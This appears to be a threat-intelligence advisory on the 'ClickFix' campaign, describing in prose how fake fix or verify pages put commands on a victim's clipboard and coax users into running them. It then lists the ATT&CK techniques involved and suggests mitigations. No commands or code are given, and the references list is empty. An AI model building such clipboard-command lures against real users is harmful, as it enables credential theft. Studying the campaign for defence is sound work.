EXECUTIVE SUMMARY:
The attack known as the “ClickFix” campaign uses a deceptively simple but effective social-engineering ploy: users are shown a bogus message that urges them to run a “fix” step and follow instructions. These instructions often ask the user to open a system dialog or terminal, paste in code, or download a “helper” application. The campaign has evolved rapidly — once primarily targeting Windows via a fake browser update or fix, it now adapts its lure to macOS, Linux and even mobile environments, tailoring messages to the victim’s operating system. For example, on macOS the script may prompt Terminal commands, while on Windows the user is asked to open Run and execute a command. This shift underscores the growing sophistication of the scheme and its reliance on tricking the user into executing the malware rather than only exploiting vulnerabilities in software.
The attack chain starts with redirection or malvertising that delivers a landing page engineered to look legitimate — for instance, a faux “OS update required” prompt, or “Click to verify” page that mimics trusted services. The user is prompted to copy/paste a command into a system dialog or Terminal that has been placed onto the clipboard via hidden JavaScript. Once executed, the command downloads or invokes malicious code — often an infostealer, remote-access trojan or loader. These payloads may run fileless or load additional modules, exfiltrate credentials, inject persistence, and evade detection. The campaign is notable for its OS-aware approach (offering commands tailored to the system), use of legitimate utilities, clipboard hijacking, and the fact that many security gateways miss it because the user explicitly invokes the command. The result: the user’s own interaction enables the compromise.
The ClickFix campaign exemplifies the shift in cyber-threat tactics from purely technical exploits toward social engineering plus legitimate tools. Because so much depends on user action — opening a Run dialog, pasting a command, executing it — traditional defenses (blocking malicious attachments, scanning downloads) may be insufficient. Mitigation therefore must emphasise user education, limiting privileged use of system dialogs like Run/Terminal, and monitoring for unusual command-line executions or unexpected downloads post-user action. Organisations should deploy endpoint detection & response (EDR) that watches for these manually triggered commands and subsequent payloads.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-Technique |
| Initial Access | T1566.002 | Phishing | Spearphishing Link |
| Execution | T1204.002 | User Execution | Malicious File |
| T1059.003 | Command and Scripting Interpreter | Windows Command Shell | |
| T1059.001 | Command and Scripting Interpreter | PowerShell | |
| T1106 | Native API Execution | — | |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys . Startup Entries |
| Defense Evasion | T1140 | Deobfuscate.Decode Files or Information | — |
| T1218.011 | System Binary Proxy Execution | Rundll32 | |
| Collection | T1005 | Data from Local System | — |
| Command & Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | — |
REFERENCES:
The following reports contain further technical details: